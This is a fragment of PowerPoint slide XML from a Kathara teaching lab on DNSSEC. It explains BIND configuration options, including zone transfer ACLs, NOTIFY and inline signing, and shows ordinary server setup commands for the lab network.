              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{971AF935-77BE-8091-0ED2-4514EF548D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A3DD33F-76CE-C98D-E9DC-F3BAD182B654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7251554" y="1989011"/>
            <a:ext cx="4580105" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85203"/>
              <a:gd name="adj2" fmla="val 201278"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enable automatic DNSSEC key management using BIND's default policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D97FB4-3713-C99B-F987-8139458911FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001344" y="3061162"/>
            <a:ext cx="3830316" cy="569247"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -121810"/>
              <a:gd name="adj2" fmla="val 103859"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>enable "inline signature".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18CB5C52-4E93-CAC3-CB44-C67566CB3AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001344" y="3846542"/>
            <a:ext cx="3830316" cy="1249873"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83676"/>
              <a:gd name="adj2" fmla="val -22925"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>defines an access control list that only allows the IP address 100.0.75.5 to download the entire zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C455760-7D60-7B93-5233-17E9A115901A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6679662" y="5312548"/>
            <a:ext cx="3830316" cy="941320"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59803"/>
              <a:gd name="adj2" fmla="val -124922"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tells the master to send a signal (NOTIFY) to IP 100.0.75.5 every time the zone is updated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B71A5515-A351-9CC4-4480-EC41CDCFC57E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124380" y="1675313"/>
            <a:ext cx="1918176" cy="1550954"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88294"/>
              <a:gd name="adj2" fmla="val 38616"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>declares that this server is the master (primary) for this zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{598DBDF9-5AF5-78EB-741F-7335419106A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124380" y="3923569"/>
            <a:ext cx="2311610" cy="1550955"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66446"/>
              <a:gd name="adj2" fmla="val -85467"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Indicates the path to the text file containing the DNS records for the zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53922628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1BCC12-AEA0-EF6C-6966-603D0016964A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A16126-8DE4-5051-0D70-B9EDC3BB467F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB7A0FB-E7C3-1075-9C06-3F717ADFC9AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51AC7AA-C8C2-F7D6-B741-9D680D38F53A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F4D3C0-A89C-9682-1DF7-F73B4B98EADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442148"/>
            <a:ext cx="7087578" cy="1973704"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC84C6E0-FA61-BCD9-8B4D-B43D445FEFB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory “/var/cache/bind”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-query {any; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    recursion no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D22B63-5F9D-75FB-8DCE-083274B4EDB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3837" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73534566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155BF1-C555-1671-F153-8C1F89E764DF}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF8BA95-97CF-01A6-4132-73BE0DE6E885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="516090" y="2086646"/>
            <a:ext cx="11159820" cy="2865208"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1009"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E67438-DF6B-58E0-5277-7FA84DE76659}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="951"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 100.0.75.5/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add default via 100.0.75.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
